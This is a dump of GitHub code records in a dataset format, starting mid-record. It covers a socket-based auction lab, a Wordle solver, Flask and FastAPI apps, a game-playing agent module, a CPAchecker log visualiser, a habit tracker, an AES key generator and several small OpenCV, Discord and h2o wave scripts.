deserialized_data = pickle.loads(data)\n with open(\"oferta_del_sniper.txt\", \"w\") as f:\n f.write(deserialized_data)\n\n sock.close()\n\n\n# Programa cliente\nasync def client():\n SOCK_BUFFER =1024\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_address = ('localhost',5000)\n sock.connect(server_address)\n number = input(\"Ingresa el numero: \")\n serialized_data = pickle.dumps(number)\n sock.sendall(serialized_data)\n\n sock.close()\n\n\n\nasync def main():\n global inicio \n inicio = time.perf_counter()\n while time.perf_counter() - inicio <= tsubasta - 3:\n await asyncio.gather(reofertar(\"a\"), reofertar(\"b\"), reofertar(\"c\"), reofertar(\"d\"), reofertar(\"e\"))\n \n await asyncio.gather(server(), client())\n await sniper()\n\n print(f\"Ofertas finales: 
{mi_diccionario}\") \n print(f\"El ganador es: {max(mi_diccionario.items(), key=lambda x: x[1])[0]}\")\n\nif __name__ == \"__main__\":\n asyncio.run(main())","repo_name":"leleletus/arquitectura_x86_64","sub_path":"labs/10/pregunta3.py","file_name":"pregunta3.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27158181461","text":"\n\nclass Field(object):\n\n def __init__(self, name, data, for_write=False):\n self.name = name\n self.data = data\n self.required = data.get('required', False)\n self.read_only = data.get('readOnly', False)\n self.write_only = data.get('writeOnly', False)\n self.type = data.get('type', '')\n self.format = data.get('format', '')\n self.items = data.get('items', {})\n\n if self.type == 'array':\n itme_type = list(data['items'].values())[0]\n self.type = itme_type + '[]'\n if 'serializer' in self.type.lower() and for_write:\n self.type = 'Write' + self.type\n\n self.required_json = 'true' if self.required else 'false'\n\n def __repr__(self):\n return self.name\n\n\nclass Serializer(object):\n\n def __init__(self, data):\n self.data = data\n self.id = data['id']\n\n if self.id.startswith('Write'):\n self.name = self.id[5:]\n self.category = 'write'\n else:\n self.name = self.id\n self.category = 'read'\n\n self.fields = []\n for field_name, field_data in data['properties'].items():\n for_write = (self.category == 'write')\n field = Field(field_name, field_data, for_write)\n self.fields.append(field)\n\n def __repr__(self):\n return self.id\n\n\nclass Parameter(object):\n \n def __init__(self, data):\n self.data = data\n self.param_type = data['paramType']\n self.name = data['name']\n self.type = data.get('type')\n self.required = data.get('required', False)\n self.description = data.get('description')\n self.enum = data.get('enum', [])\n\n self.required_json = 'true' if self.required else 'false'\n\n def __repr__(self):\n return self.name\n\n\nclass Operation(object):\n \n def __init__(self, data):\n self.patch = None\n self.data = data\n\n self.nickname = data['nickname']\n self.notes = data['notes']\n self.summary = data['summary']\n self.method = data['method'].lower()\n self.type = data['type']\n self.items = data.get('items', {})\n\n self.action_name = self.nickname.strip().split('_')[-1]\n\n self.path_parameters = []\n self.query_parameters = []\n self.form_parameters = []\n\n for parameter_data in data['parameters']:\n parameter = Parameter(parameter_data)\n\n if parameter.param_type == 'path':\n self.path_parameters.append(parameter)\n\n if parameter.param_type == 'query' and self.action_name == 'list':\n self.query_parameters.append(parameter)\n\n if parameter.param_type == 'form':\n self.form_parameters.append(parameter)\n\n self.serializer_name = self.type\n if self.serializer_name == 'array':\n self.serializer_name = self.items.get('$ref', '') + '[]'\n\n self.serializer_name_write = self.serializer_name\n if 'serializer' in self.serializer_name_write.lower():\n self.serializer_name_write = 'Write' + self.serializer_name_write\n\n def __repr__(self):\n return self.nickname\n\n\nclass Api(object):\n\n def __init__(self, data):\n self.data = data\n self.path = data['path']\n self.description = data['description']\n self.operations = []\n for operation_data in data['operations']:\n operation = Operation(operation_data)\n self.operations.append(operation)\n\n def __repr__(self):\n return '<API:%s>' % self.path\n\n def __eq__(self, other):\n if not 
isinstance(other, Api):\n return False\n return self.data == other.data\n\n def match_patches(self, patches):\n for operation in self.operations:\n for patch in patches:\n if patch.path == self.path and patch.method == operation.method:\n assert patch.matched == False\n patch.matched = True\n operation.patch = patch\n\n\nclass Patch(object):\n\n def __init__(self, path, method):\n self.path = path\n self.method = method.lower()\n self.content = '\\n'\n self.matched = False\n\n def __repr__(self):\n return '<Patch:%s %s>' % (self.path, self.method)\n\n def append_content(self, line):\n self.content += line.rstrip() + '\\n'\n \n\n\n\n\n\n\n","repo_name":"taojy123/swagger2raml","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71990873363","text":"def solution(storey):\n answer = 0\n num=[int(i) for i in reversed(str(storey))]\n num+=[0]\n for i in range(len(num)-1):\n if num[i]>5 or (num[i]==5 and num[i+1]>=5):\n answer+=10-num[i]\n num[i+1]+=1\n else:\n answer+=num[i]\n answer+=num[-1]\n return answer","repo_name":"da-in/algorithm-study","sub_path":"Warming Up/마법의 엘리베이터/hyuksoon.py","file_name":"hyuksoon.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"3"} +{"seq_id":"13608939291","text":"import random\nimport re\nimport emoji\nimport json\nimport pickle\nfrom wordfreq import word_frequency\nfrom time import sleep\nclass WordleSolver():\n def __init__(self) -> None:\n random.seed(42)\n self.small_path = 'words.csv'\n self.large_path = 'guesses.csv'\n\n def load_words(self, small = False):\n wordbank = []\n if small:\n with open(self.small_path, 'r') as f:\n words = f.read()\n wordbank = words.split('\\n')\n wordbank = list(map(lambda word: word.upper(), wordbank))\n else:\n with open(self.large_path, 'r') as f:\n words = f.read()\n wordbank = words.split('\\n')\n wordbank = list(map(lambda word: word.upper(), wordbank))\n return wordbank\n\n \n\n def get_regex(self, guess, ans_grid):\n guess = guess.upper()\n discarded = []\n misplaced = []\n build = ''\n for i in range(5):\n if ans_grid[i] == 0:\n discarded.append(guess[i])\n for i in range(5):\n if ans_grid[i] == 2:\n build += guess[i]\n elif ans_grid[i] == 1:\n misplaced.append(guess[i])\n build += f'[^{guess[i]}{\"\".join(discarded)}]'\n else:\n build+= f'[^{\"\".join(discarded)}]'\n return build, misplaced\n\n def get_possible_words(self, guess, ans_grid, wordbank = []):\n if not wordbank:\n wordbank = self.load_words()\n possibilities = []\n restring, misplaced = self.get_regex(guess, ans_grid)\n for word in wordbank:\n if re.match(restring, word):\n possibilities.append(word)\n filtered = []\n for letter in misplaced:\n for word in possibilities:\n if letter not in word:\n filtered.append(word)\n for word in set(filtered):\n possibilities.remove(word)\n possibilities = sorted(possibilities, key=lambda x: word_frequency(x, 'en'), reverse=True)\n return possibilities\n \n def assistant(self,wordbank = [], random_word = True):\n guess = input('Please enter guess : ')\n ans_grid = input('Please enter answer grid:\\n0 - letter not in word\\n1 - letter in word but wrong position\\n2 - letter in correct position:\\n')\n ans_grid = list(map(lambda x: int(x), list(ans_grid)))\n possible = self.get_possible_words(guess, ans_grid, wordbank)\n if len(possible) == 1 or sum(ans_grid) == 10:\n 
print('Congratulations. The answer is :', possible[0])\n sleep(2)\n exit()\n if len(possible) > 15:\n if random_word:\n print(f'{len(possible)} possibilities. Choosing random word: {random.choice(possible)}')\n else:\n print(f'{len(possible)} possibilities. Choosing most frequent word: {possible[0]}')\n else:\n print(f'{len(possible)} possibilities:\\n{possible} ')\n proceed = input('Continue? (Y/N): ')\n \n if proceed.upper() == 'Y':\n self.assistant(possible)\n else:\n print(\"Thanks for playing\")\n sleep(2)\n\nif __name__ == '__main__':\n solver = WordleSolver()\n solver.assistant()","repo_name":"omni64/wordle_solver","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1072527859","text":"#!/usr/bin/env python3\n\n\"\"\"\nModule that contains definitions for application routes\n\"\"\"\n\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef hello_world():\n \"\"\"\n Returns the basic index page for the application\n :return: 0-index.html template\n \"\"\"\n return render_template('0-index.html')\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"INChukwudi/alx-backend","sub_path":"0x02-i18n/0-app.py","file_name":"0-app.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16661548604","text":"from fastapi import status, HTTPException\nfrom fastapi.responses import RedirectResponse\nfrom fastapi.routing import APIRouter\nfrom app.usecases import shorten_url as shorten_url_usecase\nfrom app.usecases.exceptions import AliasAlreadyExistsException, AliasNotFoundException\n\n\nrouter = APIRouter()\nrepo = shorten_url_usecase.InMemoryUrlRepository()\n\n\n@router.post(\n \"/shorten\",\n status_code=status.HTTP_201_CREATED,\n response_model=shorten_url_usecase.ShortenResponse,\n)\nasync def shorten_url(schema: shorten_url_usecase.ShortenRequest):\n try:\n url = shorten_url_usecase.shorten(schema, repo=repo)\n except AliasAlreadyExistsException:\n raise HTTPException(\n status_code=status.HTTP_409_CONFLICT,\n detail=\"Alias already exists\",\n )\n return url\n\n\n@router.get(\"/r/{alias}\")\nasync def redirect(alias: str):\n redirect_request = shorten_url_usecase.RedirectRequest(alias=alias)\n\n try:\n usecase_response = shorten_url_usecase.redirect(redirect_request, repo=repo)\n except AliasNotFoundException:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"URL not found\",\n )\n\n return RedirectResponse(usecase_response.url)\n\n\n@router.get(\"/health\")\nasync def health():\n return {\"status\": \"ok\"}\n","repo_name":"carlosporta/link-shortener","sub_path":"app/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35296902892","text":"import hometrainer.core as core\nfrom hometrainer.config import Configuration\nimport time\nimport concurrent.futures\nimport numpy as np\n\n\nclass Agent:\n \"\"\"Agent that is able to play a game. This means it can take an game state and give it's best move.\n\n The agent get's some more lifecycle callbacks if it needs to for example note moves of the enemy to\n improve its decisions. 
An agent is usually an AI program that calculates a good move,\n but can also be an interface for an human player to compete in an match.\n\n Note: Agents must be able to be copied, as they might be initialized multiple times for one match\n with more than two players. This helps you if your agent holds player specific state.\"\"\"\n def game_start(self, game_state, agents_player):\n \"\"\"Called when the new game starts. Can be used for setup code.\"\"\"\n pass\n\n def find_move_with_time_limit(self, game_state, move_time):\n \"\"\"Implement your logic to find a move with a given time limit in here.\"\"\"\n raise NotImplementedError('Move finding (time limit) method not implemented!')\n\n def find_move_with_iteration_limit(self, game_state, move_iterations):\n \"\"\"Implement your logic to find a move with a given iteration limit in here.\"\"\"\n raise NotImplementedError('Move finding (iteration limit) method not implemented!')\n\n def move_executed(self, old_game_state, move, new_game_state):\n \"\"\"Called after a move was executed in the current game.\"\"\"\n pass\n\n def game_ended(self, game_state):\n \"\"\"Called when the game ended. Can be used for teardown code.\"\"\"\n pass\n\n\nclass NeuralNetworkAgent(Agent):\n \"\"\"Agent using a neural network and the alpha zero search for finding moves.\"\"\"\n def __init__(self, nn_client, config: Configuration, collect_evaluations=False, temperature=None):\n \"\"\"\n :param nn_client: The neural network client used to get evaluations\n :param collect_evaluations: If true a evaluations will be created using the search trees from each executed move\n :param temperature: If set to a value moves will be chosen probabilistic using this temperature\n \"\"\"\n self.nn_client = nn_client\n\n self.collect_evaluations = collect_evaluations\n self.collected_evaluations = []\n\n self.temperature = temperature\n self.config = config\n\n self.current_mcts_node = None\n self.thread_pool = None\n\n def game_start(self, game_state, agents_player):\n self.current_mcts_node = core.MCTSNode(1.0, game_state, self.config)\n\n n_threads = self.config.n_search_threads_selfplay()\n self.thread_pool = None\n if n_threads > 1:\n self.thread_pool = concurrent.futures.ThreadPoolExecutor(n_threads)\n\n self.nn_client.start(self.config)\n\n def find_move_with_time_limit(self, game_state, move_time):\n move_end_time = time.time() + move_time\n\n while True:\n self._run_mcts_simulations(16)\n if move_end_time < time.time():\n break\n\n self._create_evaluation()\n return self._find_best_move()\n\n def find_move_with_iteration_limit(self, game_state, move_iterations):\n self._run_mcts_simulations(move_iterations)\n self._create_evaluation()\n return self._find_best_move()\n\n def _run_mcts_simulations(self, n_simulations):\n # We can run serial or parallel in a thread pool\n if not self.thread_pool:\n for i in range(n_simulations):\n self.current_mcts_node.run_simulation_step(self.nn_client)\n else:\n futures = []\n for i in range(n_simulations):\n futures.append(self.thread_pool.submit(self.current_mcts_node.run_simulation_step, self.nn_client))\n concurrent.futures.wait(futures)\n\n def _find_best_move(self):\n # Either select probabilistic or simply take the best move.\n if self.temperature:\n move_probabilities = self.current_mcts_node.move_probabilities(self.temperature).items()\n moves = [item[0] for item in move_probabilities]\n probabilities = [item[1] for item in move_probabilities]\n\n # Select the move according to the probability distribution\n index = 
np.random.choice(len(moves), p=probabilities)\n return moves[index]\n else:\n move_probabilities = self.current_mcts_node.move_probabilities(1.0)\n best_move = None\n best_prob = -1\n\n for move, prob in move_probabilities.items():\n if prob > best_prob:\n best_prob = prob\n best_move = move\n\n return best_move\n\n def _create_evaluation(self):\n \"\"\"Creates an evaluation of the current MCTSExecutor and adds it to the collected evaluations for this run\"\"\"\n if not self.collect_evaluations:\n return\n\n evaluation = self.current_mcts_node.game_state.wrap_in_evaluation()\n evaluation.set_move_probabilities(self.current_mcts_node.move_probabilities(1.0))\n\n self.collected_evaluations.append(evaluation)\n\n def move_executed(self, _, move, new_game_state):\n # Try to keep parts of the tree if possible\n if self.current_mcts_node and self.current_mcts_node.children and self.current_mcts_node.children[move]:\n self.current_mcts_node = self.current_mcts_node.children[move]\n else:\n self.current_mcts_node = core.MCTSNode(1.0, new_game_state, self.config)\n\n def game_ended(self, game_state):\n # If we did collect evaluations update them according to the actual results.\n actual_game_result = game_state.calculate_scores()\n for evaluation in self.collected_evaluations:\n evaluation.set_expected_result(actual_game_result)\n\n # Tear down any resources left\n self.thread_pool.shutdown(wait=False)\n\n # Stop NN client\n self.nn_client.stop()\n","repo_name":"FritzFlorian/hometrainer","sub_path":"hometrainer/agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":5996,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"31941434476","text":"import argparse\nimport json\nimport sys\nimport webbrowser\nfrom pathlib import Path\nfrom datetime import datetime\n\nfrom typing import Dict\n\nfrom airium import Airium\n\nimport networkx as nx\nimport pydot\n\nENCODING = \"UTF-8\"\n\n\ndef create_arg_parser():\n parser = argparse.ArgumentParser(description=\"Transforms Worker logs to HTML.\")\n parser.add_argument(\n \"--messages-json\",\n help=\"Path to JSON file that contains messages sent during distributed block analysis.\",\n default=\"output/block_analysis/block_analysis.json\",\n )\n parser.add_argument(\n \"--block-structure-json\",\n help=\"Path to JSON file that contains the block structure used for\"\n \" distributed block analysis\",\n default=\"output/block_analysis/blocks.json\",\n )\n parser.add_argument(\n \"-o\",\n \"--output\",\n help=\"Output path for generated files\",\n default=\"output/block_analysis\",\n )\n return parser\n\n\ndef parse_args(argv):\n parser = create_arg_parser()\n args = parser.parse_args(argv)\n\n args.block_structure_json = Path(args.block_structure_json)\n if not args.block_structure_json.exists():\n raise ValueError(f\"Path {args.block_structure_json} does not exist.\")\n\n args.messages_json = Path(args.messages_json)\n if not args.messages_json.exists():\n raise ValueError(f\"Path {args.messages_json} does not exist.\")\n\n args.output = Path(args.output)\n return args\n\n\ndef parse_jsons(json_file: Path):\n with open(json_file, encoding=ENCODING) as inp:\n return json.load(inp)\n\n\ndef html_for_message(message, block_log: Dict[str, str]):\n div = Airium()\n\n if not message:\n with div.div():\n div(\"\")\n return str(div), \"\"\n\n infos = block_log[message[\"from\"]]\n\n predecessors = infos.get(\"predecessors\", [])\n successors = infos.get(\"successors\", [])\n result = 
message.get(\"payload\", \"no contents available\")\n direction = message[\"type\"]\n arrow = \"-\"\n senders = [\"all\"]\n receivers = [\"all\"]\n if direction == \"BLOCK_POSTCONDITION\":\n receivers = successors\n senders = predecessors\n arrow = \"↓\"\n elif direction == \"ERROR_CONDITION\":\n receivers = predecessors\n senders = successors\n arrow = \"↑\"\n elif direction == \"ERROR_CONDITION_UNREACHABLE\":\n receivers = [\"all\"]\n senders = successors\n arrow = \"↑\"\n elif direction == \"FOUND_RESULT\":\n senders = [message[\"from\"]]\n\n code = \"\\n\".join([x for x in infos[\"code\"] if x])\n\n with div.div(title=code):\n with div.p():\n with div.span():\n div(arrow)\n with div.span():\n sender = \"self\"\n if senders:\n sender = \", \".join(senders)\n else:\n sender = \"None\"\n div(f\"React to message from <strong>{sender}</strong>:\")\n with div.p():\n if receivers:\n receiver = \", \".join(receivers)\n else:\n receiver = \"None\"\n div(f\"Calculated new {direction} message for <strong>{receiver}</strong>\")\n div.textarea(_t=result)\n\n return str(div)\n\n\ndef html_dict_to_html_table(all_messages, block_logs: Dict[str, str]):\n first_timestamp = int(all_messages[0][\"timestamp\"])\n timestamp_to_message = {}\n sorted_keys = sorted(block_logs.keys(), key=lambda x: int(x[1::]))\n index_dict = {}\n for index in enumerate(sorted_keys):\n index_dict[index[1]] = index[0]\n for message in all_messages:\n timestamp_to_message.setdefault(\n message[\"timestamp\"] - first_timestamp, [\"\"] * len(block_logs)\n )[index_dict[message[\"from\"]]] = message\n headers = [\"time\"] + sorted_keys\n table = Airium()\n with table.table(klass=\"worker\"):\n # header\n with table.tr(klass=\"header_row\"):\n for key in headers:\n table.th(_t=f\"{key}\")\n\n # row values\n type_to_klass = {\n \"BLOCK_POSTCONDITION\": \"precondition\",\n \"ERROR_CONDITION\": \"postcondition\",\n \"ERROR_CONDITION_UNREACHABLE\": \"postcondition\",\n }\n for timestamp, messages in timestamp_to_message.items():\n with table.tr():\n table.td(_t=str(timestamp))\n for msg in messages:\n if not msg:\n table.td()\n else:\n klass = type_to_klass.get(msg[\"type\"], \"normal\")\n table.td(klass=klass, _t=html_for_message(msg, block_logs))\n\n return str(table)\n\n\ndef visualize_blocks(\n block_structure_file: Path,\n output_path: Path,\n output_dot_name=\"graph.dot\",\n output_png_name=\"graph.png\",\n):\n g = nx.DiGraph()\n block_logs = parse_jsons(block_structure_file)\n for key in block_logs:\n code = \"\\n\".join(c for c in block_logs[key][\"code\"] if c)\n label = key + \":\\n\" + code if code else key\n g.add_node(key, shape=\"box\", label=f'\"{label}\"')\n for key in block_logs:\n if \"successors\" in block_logs[key]:\n for successor in block_logs[key][\"successors\"]:\n g.add_edge(key, successor)\n\n output_path.mkdir(parents=True, exist_ok=True)\n graph_dot = output_path / output_dot_name\n nx.drawing.nx_pydot.write_dot(g, str(graph_dot))\n (graph,) = pydot.graph_from_dot_file(str(graph_dot))\n graph.write_png(str(output_path / output_png_name))\n\n\ndef export_messages_table(\n *,\n all_messages,\n block_logs,\n output_path,\n report_filename=\"report.html\",\n message_table_html_file=None,\n message_table_css_file=None,\n):\n if message_table_html_file is None:\n message_table_html_file = Path(__file__).parent / \"table.html\"\n if message_table_css_file is None:\n message_table_css_file = Path(__file__).parent / \"table.css\"\n\n for message in all_messages:\n # 2022-03-10 14:44:07.0318755\n message[\"timestamp\"] = 
int(\n datetime.strptime(message[\"timestamp\"], \"%Y-%m-%d %H:%M:%S.%f\").timestamp()\n )\n all_messages = sorted(\n all_messages, key=lambda entry: (entry[\"timestamp\"], entry[\"from\"][1::])\n )\n\n output_path.mkdir(parents=True, exist_ok=True)\n with open(message_table_html_file, encoding=ENCODING) as html:\n with open(message_table_css_file, encoding=ENCODING) as css:\n text = (\n html.read()\n .replace(\n \"<!--<<<TABLE>>><!-->\",\n html_dict_to_html_table(all_messages, block_logs),\n )\n .replace(\"/*CSS*/\", css.read())\n )\n output_file = output_path / report_filename\n with open(output_file, \"w+\", encoding=ENCODING) as new_html:\n new_html.write(text)\n return output_file\n\n\ndef visualize_messages(messages_file: Path, output_path: Path):\n block_logs = parse_jsons(messages_file)\n all_messages = []\n for key in block_logs:\n if \"messages\" in block_logs[key]:\n all_messages += block_logs[key][\"messages\"]\n if not all_messages:\n return\n\n export_filename = export_messages_table(\n all_messages=all_messages, block_logs=block_logs, output_path=output_path\n )\n webbrowser.open(str(export_filename))\n\n\ndef main(argv=None):\n if argv is None:\n argv = sys.argv[1:]\n args = parse_args(argv)\n output_path: Path = args.output\n\n visualize_blocks(\n block_structure_file=args.block_structure_json, output_path=output_path\n )\n\n visualize_messages(messages_file=args.messages_json, output_path=output_path)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"sosy-lab/cpachecker","sub_path":"contrib/worker-visualization/log_to_html.py","file_name":"log_to_html.py","file_ext":"py","file_size_in_byte":7725,"program_lang":"python","lang":"en","doc_type":"code","stars":202,"dataset":"github-code","pt":"3"} +{"seq_id":"71556302801","text":"#!/usr/bin/env python3.9\n\n\"\"\"A usefull cogs for League of legends.\"\"\"\n\nimport discord\nfrom discord.ext import commands\n\n\nclass Lol(commands.Cog):\n \"\"\"Classe d'outils pour League of legends.\"\"\"\n\n # ###### #\n # Events #\n # ###### #\n\n @commands.Cog.listener()\n async def on_ready(self):\n \"\"\"Déclare être prêt.\"\"\"\n print(\" Lol's Cog is ready.\")\n\n @commands.Cog.listener(name=\"game launched\")\n async def game_launched(self, ctx: commands.Context):\n \"\"\"Notifie dés qu'une personne lance un jeu\"\"\"\n async for m in ctx.guild.members:\n if m.activity == discord.ActivityType.playing:\n print(f\"{m.display_name} joue à {m.activity.game}\")\n\n # ######### #\n # Functions #\n # ######### #\n\n\n # ######### #\n # Commandes #\n # ######### #\n\n @commands.command(aliases=[\"alias_de_une_commande\"])\n @access.me # droit d'utilisation aux commandes\n async def une_commande(self, ctx: commands.Context, *, txt: str):\n \"\"\"Une commande dont je ne connais pas l'utilité.\"\"\"\n await ctx.send(fcite(txt))\n\n\n @commands.command()\n @access.me\n async def lol_test(self, ctx: commands.Context, *, txt: str):\n \"\"\"Commande de test\"\"\"\n await ctx.send(ctx.author.activities[0].name)\n\n\ndef setup(bot: commands.Bot):\n \"\"\"Setup the bot for the main cog.\"\"\"\n bot.add_cog(Lol(bot))","repo_name":"ValentinColin/yukki","sub_path":"cogs/dev/lol.py","file_name":"lol.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19520079795","text":"# Given an array x (e.g. [1,5, 10, 7, -2]), create an algorithm (sets of instructions) that shifts each number by one (to the front). 
For example when the program is done x (assuming it was [1,5,10,7,-2]) should become [5,10,7,-2, 0]. \n\ndef shiftingArrValues(arr, x=0):\n if x == len(arr)-1:\n arr[x] = 0\n return arr\n arr[x] = arr[x+1]\n return shiftingArrValues(arr, x+1)\n\nprint(shiftingArrValues([1, 5, 10, 7, -2]))","repo_name":"Nolan0796/My_Daily_Algorithm_Practice","sub_path":"3-9-22.py","file_name":"3-9-22.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24323077570","text":"import cv2\nimport numpy as np\nfrom os import listdir\nfrom os.path import isfile, join\nfrom imutils.object_detection import non_max_suppression\nimport maths\n\ndef identify(image, templateDir, threshold=0.5): \n boxes = []\n pair = []\n imageGray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n templates = [f for f in listdir(templateDir) if isfile(join(templateDir, f))]\n\n for template in templates:\n templateGray = cv2.resize(cv2.imread(templateDir + template, cv2.IMREAD_GRAYSCALE), dsize=(0, 0), fx=0.3, fy=0.3)\n (tH, tW) = templateGray.shape[:2]\n\n result = cv2.matchTemplate(imageGray, templateGray, cv2.TM_CCOEFF_NORMED)\n (ys, xs) = np.where(threshold < result)\n\n rects = []\n for (x, y) in zip(xs, ys):\n rects.append((x, y, x + tW, y + tH))\n\n filtered = non_max_suppression(np.array(rects))\n \n for x in filtered:\n boxes.append(x)\n pair.append((x, template))\n\n recognitions = non_max_suppression(np.array(boxes))\n tmp = pair.copy()\n\n removedCount = 0\n for i in range(0, len(pair)):\n (box, template) = pair[i]\n\n if(box not in recognitions):\n tmp.pop(i - removedCount)\n removedCount += 1\n\n recognitionCenters = [maths.getCenter(x[0]) for x in tmp]\n dist = []\n overlapping = [] #store indexes of overlapping boxes\n\n for ii in range(0, len(tmp)):\n (box, template) = tmp[ii]\n if(template == \"pc.PNG\" or template == \"server.PNG\"):\n continue\n\n boxCenter = maths.getCenter(box)\n dist = [maths.getDistance(boxCenter, x) for x in recognitionCenters]\n\n collisionID = [i for i in range(len(dist)) if dist[i] == 1]\n\n if len(collisionID) == 1:\n overlapping.append(collisionID[0])\n \n if 1 <= len(overlapping):\n for ovI in overlapping:\n del tmp[ovI]\n\n return tmp","repo_name":"Remory52/AutoNetworking","sub_path":"extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42279615658","text":"import cv2\nfrom cv2 import VideoCapture\nfrom cv2 import waitKey\nprint(cv2.__version__)\n\nvideo = cv2.videoCapture(\"video.mov\")\nwhile True:\n ret, frame = video.read()\n frame = cv2.resize(frame, (1000, 600))\n\n if ret == False:\n break\n\n cv2.imshow(\"Output\", frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\ncv2.destroyAllWindows()\nvideo.release()\n\n","repo_name":"AtangBofelo/Fire-Detection-System","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28840999822","text":"import requests\nfrom datetime import datetime\nimport os\n\n\nUSERNAME = os.environ[\"USERNAME\"]\nTOKEN = os.environ[\"TOKEN\"]\n\npixela_endpoint = \"https://pixe.la/v1/users\"\n\nuser_params = {\n \"token\": TOKEN,\n \"username\": USERNAME,\n \"agreeTermsOfService\": \"yes\",\n \"notMinor\": \"yes\"\n}\n\n# response = requests.post(url=pixela_endpoint, json=user_params)\n# 
print(response.text)\n\ngraph_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs\"\n\nGRAPH_ID = \"graph1\"\n\ngraph_config = {\n \"id\": GRAPH_ID,\n \"name\": \"Cycling Graph\",\n \"unit\": \"Km\",\n \"type\": \"float\",\n \"color\": \"ichou\"\n}\n\nheaders = {\n \"X-USER-TOKEN\": TOKEN\n}\n\n# response = requests.post(url=graph_endpoint, json=graph_config, headers=headers)\n# print(response.text)\n\npixel_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs/{GRAPH_ID}\"\n\ntoday = datetime.now()\n\npixel_params = {\n \"date\": today.strftime(\"%Y%m%d\"),\n \"quantity\": input(\"How many kilometers did you cycle today? \"),\n}\n\nresponse = requests.post(url=pixel_endpoint, json=pixel_params, headers=headers)\nprint(response.text)\n\nupdate_pixel_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs/{GRAPH_ID}/{today.strftime('%Y%m%d')}\"\n\nupdate_pixel_params = {\n \"quantity\": \"10\"\n}\n\n# response = requests.put(url=update_pixel_endpoint, json=update_pixel_params, headers=headers)\n# print(response.text)\n\ndelete_pixel_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs/{GRAPH_ID}/{today.strftime('%Y%m%d')}\"\n\n# response = requests.delete(url=delete_pixel_endpoint, headers=headers)\n# print(response.text)\n","repo_name":"Solutionhod/habit-tracker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10050225311","text":"# AES Cipher Key Generation\n# Author: Jonathan Kenney (M08837382)\n\n# imports\nfrom sys import argv\nfrom os import urandom\n\ndef main():\n \n # get key size from args\n try:\n key_size = int(argv[1])\n except:\n print('\\nUsage:\\npython3 keygen.py [KEY_SIZE]\\n')\n exit(1)\n\n # check supplied key size\n if key_size not in (16, 24, 32):\n print('ERROR: Invalid key size, must be in {16, 24, 32}\\n')\n exit(1)\n\n # returns random key (bytes) from OS and converts to hex\n key = urandom(key_size).hex()\n\n # print key (in hex) to stdout\n print('Secret key: %s' % key)\n\n # store key (in hex) in file\n with open('./data/key.txt', 'w') as f:\n f.write(key)\n f.close()\n\n return\n\n# main boilerplate\nif __name__ == '__main__':\n main()","repo_name":"joonsberry/aes","sub_path":"build/keygen.py","file_name":"keygen.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18666416367","text":"from h2o_wave import Q, ui, main, app\n\n\n@app('/demo/nav')\nasync def serve2(q: Q):\n if '#' in q.args:\n hash_ = q.args['#']\n q.page['nav'] = ui.form_card(box='1 1 2 5', items=[\n ui.text(f'#={hash_}'),\n ui.button(name='show_nav', label='Back', primary=True),\n ])\n else:\n q.page['nav'] = ui.nav_card(\n box='1 1 2 5',\n value='#menu/spam',\n items=[\n ui.nav_group('Menu', items=[\n ui.nav_item(name='#menu/spam', label='Spam'),\n ui.nav_item(name='#menu/ham', label='Ham'),\n ui.nav_item(name='#menu/eggs', label='Eggs'),\n ui.nav_item(name='#menu/toast', label='Toast', disabled=True),\n ]),\n ui.nav_group('Help', items=[\n ui.nav_item(name='#about', label='About', icon='Info'),\n ui.nav_item(name='#support', label='Support', icon='Help'),\n ])\n ],\n )\n await q.page.save()\n\n\n@app('/demo/theme')\nasync def serve1(q: Q):\n if not q.client.initialized:\n q.page['meta'] = ui.meta_card(box='')\n q.page['controls'] = ui.form_card(box='1 1 2 8', items=[\n ui.text_xl('Form'),\n ui.textbox(name='textbox', label='Textbox'),\n ui.toggle(name='toggle', 
